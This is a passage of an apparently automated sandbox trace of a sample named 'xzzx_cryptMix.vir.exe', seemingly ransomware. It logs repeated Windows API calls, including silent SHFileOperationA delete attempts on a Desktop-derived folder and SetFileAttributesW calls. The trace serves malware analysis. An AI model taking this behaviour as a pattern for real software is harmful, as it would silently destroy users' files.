nBufferLength=0x105, lpBuffer=0x1815d8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0086.736] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18a058, lpFilePart=0x1817f4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1817f4*="system32") returned 0x13 [0086.736] SetFileAttributesW (lpFileName="ݯ瘀퓽\x16￾￿㲣盭\x02", dwFileAttributes=0x20) returned 0 [0086.737] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0086.737] GetDC (hWnd=0x0) returned 0xb0107d7 [0086.737] CreateCompatibleDC (hdc=0xb0107d7) returned 0x180101bc [0086.737] GetIconInfo (in: hIcon=0x0, piconinfo=0x18efd0 | out: piconinfo=0x18efd0) returned 0 [0086.737] GetDC (hWnd=0x0) returned 0x601068c [0086.737] CreateCompatibleDC (hdc=0x601068c) returned 0x601026c [0086.737] GetIconInfo (in: hIcon=0x0, piconinfo=0x18eef4 | out: piconinfo=0x18eef4) returned 0 [0086.737] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0086.738] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0086.738] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e9ec, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0086.738] PathRemoveFileSpecA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0086.738] wsprintfA (in: param_1=0x18e9ec, param_2="%sFolder" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder") returned 43 [0086.892] SHFileOperationA (in: lpFileOp=0x18f714*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x3d0000) | out: lpFileOp=0x18f714*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x3d0000)) returned 2 [0087.406] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.407] GetDC (hWnd=0x0) returned 0x5010243 [0087.407] CreateCompatibleDC (hdc=0x5010243) returned 0x6010244 [0087.407] GetIconInfo (in: hIcon=0x0, piconinfo=0x18eea4 | out: piconinfo=0x18eea4) returned 0 [0087.407] GetDC (hWnd=0x0) returned 0x7010241 [0087.407] CreateCompatibleDC (hdc=0x7010241) returned 0x5010246 [0087.407] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ee7c | out: piconinfo=0x18ee7c) returned 0 [0087.407] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.407] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18ac74, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.407] GetDC (hWnd=0x0) returned 0x3010242 [0087.407] CreateCompatibleDC (hdc=0x3010242) returned 0x601023f [0087.407] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ee54 | out: piconinfo=0x18ee54) returned 0 [0087.407] GetDC (hWnd=0x0) returned 0x3010240 [0087.407] CreateCompatibleDC (hdc=0x3010240) returned 0x601023d [0087.407] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ee2c | out: piconinfo=0x18ee2c) returned 0 [0087.407] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.407] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e5dc, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0087.407] PathRemoveFileSpecA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0087.407] wsprintfA (in: param_1=0x18e5dc, param_2="%sFolder" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder") returned 43 [0087.407] SHFileOperationA (in: lpFileOp=0x18f514*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="") | out: lpFileOp=0x18f514*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="")) returned 2 [0087.410] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.410] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x189640, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.410] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.410] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18c3a4, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.410] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815e4 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.410] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18c1a0, lpFilePart=0x181800 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x181800*="system32") returned 0x13 [0087.410] SetFileAttributesW (lpFileName="ݯ縀", dwFileAttributes=0x20) returned 0 [0087.410] GetDC (hWnd=0x0) returned 0x301023e [0087.410] CreateCompatibleDC (hdc=0x301023e) returned 0x601023b [0087.410] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ee40 | out: piconinfo=0x18ee40) returned 0 [0087.410] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e8e8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0087.410] PathRemoveFileSpecA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0087.410] wsprintfA (in: param_1=0x18e8e8, param_2="%sFolder" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder") returned 43 [0087.410] SHFileOperationA (in: lpFileOp=0x18f6d4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="@Íy\x95¨¸") | out: lpFileOp=0x18f6d4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="@Íy\x95¨¸")) returned 2 [0087.412] SetFileAttributesW (lpFileName="ݯ䌀䕄䝆䥈䭊", dwFileAttributes=0x20) returned 0 [0087.412] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815d8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.412] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18bf9c, lpFilePart=0x1817f4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1817f4*="system32") returned 0x13 [0087.412] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815d8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.412] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18bd98, lpFilePart=0x1817f4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1817f4*="system32") returned 0x13 [0087.412] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.412] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18ddbc, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0087.412] PathRemoveFileSpecA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0087.412] wsprintfA (in: param_1=0x18ddbc, param_2="%sFolder" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder") returned 43 [0087.412] SHFileOperationA (in: lpFileOp=0x18f5d4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xa50000) | out: lpFileOp=0x18f5d4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xa50000)) returned 2 [0087.414] GetDC (hWnd=0x0) returned 0x301023c [0087.414] CreateCompatibleDC (hdc=0x301023c) returned 0x6010239 [0087.414] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ee90 | out: piconinfo=0x18ee90) returned 0 [0087.415] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.415] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18bb94, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.415] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815d8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.415] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18c4a8, lpFilePart=0x1817f4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1817f4*="system32") returned 0x13 [0087.415] SetFileAttributesW (lpFileName="ݯ숀Ä,\x01", dwFileAttributes=0x20) returned 0 [0087.415] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e3d4, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0087.415] PathRemoveFileSpecA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0087.415] wsprintfA (in: param_1=0x18e3d4, param_2="%sFolder" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder") returned 43 [0087.415] SHFileOperationA (in: lpFileOp=0x18f694*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x0) | out: lpFileOp=0x18f694*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x0)) returned 2 [0087.417] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.417] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18b790, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.417] SetFileAttributesW (lpFileName="ݯ琀￿￿ﯚ盫褊痏\x02", dwFileAttributes=0x20) returned 0 [0087.417] GetDC (hWnd=0x0) returned 0x301023a [0087.417] CreateCompatibleDC (hdc=0x301023a) returned 0x6010237 [0087.417] GetIconInfo (in: hIcon=0x0, piconinfo=0x18efbc | out: piconinfo=0x18efbc) returned 0 [0087.417] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18d9ac, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0087.417] PathRemoveFileSpecA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0087.417] wsprintfA (in: param_1=0x18d9ac, param_2="%sFolder" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder") returned 43 [0087.417] SHFileOperationA (in: lpFileOp=0x18f554*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="") | out: lpFileOp=0x18f554*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="")) returned 2 [0087.419] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.419] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18b58c, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.419] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815d8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.419] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18b388, lpFilePart=0x1817f4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1817f4*="system32") returned 0x13 [0087.419] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e1cc, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0087.419] PathRemoveFileSpecA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0087.419] wsprintfA (in: param_1=0x18e1cc, param_2="%sFolder" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder") returned 43 [0087.419] SHFileOperationA (in: lpFileOp=0x18f654*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xc50000) | out: lpFileOp=0x18f654*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xc50000)) returned 2 [0087.421] GetDC (hWnd=0x0) returned 0x3010238 [0087.421] CreateCompatibleDC (hdc=0x3010238) returned 0x6010235 [0087.421] GetIconInfo (in: hIcon=0x0, piconinfo=0x18eee0 | out: piconinfo=0x18eee0) returned 0 [0087.421] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.422] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18dbb4, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0087.422] PathRemoveFileSpecA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0087.422] wsprintfA (in: param_1=0x18dbb4, param_2="%sFolder" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder") returned 43 [0087.422] SHFileOperationA (in: lpFileOp=0x18f594*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x20260000) | out: lpFileOp=0x18f594*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x20260000)) returned 2 [0087.423] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.424] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18dfc4, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0087.424] PathRemoveFileSpecA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0087.424] wsprintfA (in: param_1=0x18dfc4, param_2="%sFolder" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder") returned 43 [0087.424] SHFileOperationA (in: lpFileOp=0x18f754*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x5d0000) | out: lpFileOp=0x18f754*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x5d0000)) returned 2 [0087.426] GetDC (hWnd=0x0) returned 0x3010236 [0087.426] CreateCompatibleDC (hdc=0x3010236) returned 0x6010233 [0087.426] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ef94 | out: piconinfo=0x18ef94) returned 0 [0087.426] GetDC (hWnd=0x0) returned 0x3010234 [0087.426] CreateCompatibleDC (hdc=0x3010234) returned 0x6010231 [0087.426] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ef80 | out: piconinfo=0x18ef80) returned 0 [0087.426] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.426] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e7e4, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0087.426] PathRemoveFileSpecA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0087.426] wsprintfA (in: param_1=0x18e7e4, param_2="%sFolder" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder") returned 43 [0087.426] SHFileOperationA (in: lpFileOp=0x18f734*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="") | out: lpFileOp=0x18f734*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="")) returned 2 [0087.428] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.428] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18b184, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.428] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e6e0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0087.428] PathRemoveFileSpecA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0087.428] wsprintfA (in: param_1=0x18e6e0, param_2="%sFolder" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder") returned 43 [0087.428] SHFileOperationA (in: lpFileOp=0x18f6f4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x01") | out: lpFileOp=0x18f6f4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x01")) returned 2 [0087.430] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.430] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.430] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18af80, lpFilePart=0x18180c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x18180c*="system32") returned 0x13 [0087.430] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815d8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.430] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18ad78, lpFilePart=0x1817f4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1817f4*="system32") returned 0x13 [0087.430] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e4d8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0087.430] PathRemoveFileSpecA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0087.430] wsprintfA (in: param_1=0x18e4d8, param_2="%sFolder" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder") returned 43 [0087.430] SHFileOperationA (in: lpFileOp=0x18f6b4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xd0000) | out: lpFileOp=0x18f6b4*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xd0000)) returned 2 [0087.432] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.433] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.433] GetDC (hWnd=0x0) returned 0x3010232 [0087.433] CreateCompatibleDC (hdc=0x3010232) returned 0x601022f [0087.433] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ef6c | out: piconinfo=0x18ef6c) returned 0 [0087.433] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815d8 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.433] GetFullPathNameA (in: lpFileName="C:.", nBufferLength=0x104, lpBuffer=0x18ab70, lpFilePart=0x1817f4 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x1817f4*="system32") returned 0x13 [0087.433] GetDC (hWnd=0x0) returned 0x3010230 [0087.433] CreateCompatibleDC (hdc=0x3010230) returned 0x601022d [0087.433] GetIconInfo (in: hIcon=0x0, piconinfo=0x18ef58 | out: piconinfo=0x18ef58) returned 0 [0087.433] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e2d0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0087.433] PathRemoveFileSpecA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0087.433] wsprintfA (in: param_1=0x18e2d0, param_2="%sFolder" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder") returned 43 [0087.433] SHFileOperationA (in: lpFileOp=0x18f674*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xd50000) | out: lpFileOp=0x18f674*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xd50000)) returned 2 [0087.435] SetFileAttributesW (lpFileName="ݯ", dwFileAttributes=0x20) returned 0 [0087.435] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18e0c8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xzzx_cryptmix.vir.exe")) returned 0x3b [0087.435] PathRemoveFileSpecA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xzzx_cryptMix.vir.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0087.435] wsprintfA (in: param_1=0x18e0c8, param_2="%sFolder" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder") returned 43 [0087.435] SHFileOperationA (in: lpFileOp=0x18f634*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xd50000) | out: lpFileOp=0x18f634*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\DesktopFolder", pTo=0x0, fFlags=0x414, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0xd50000)) returned 2 [0087.437] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1815f0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0087.437] GetFullPathNameA (in: 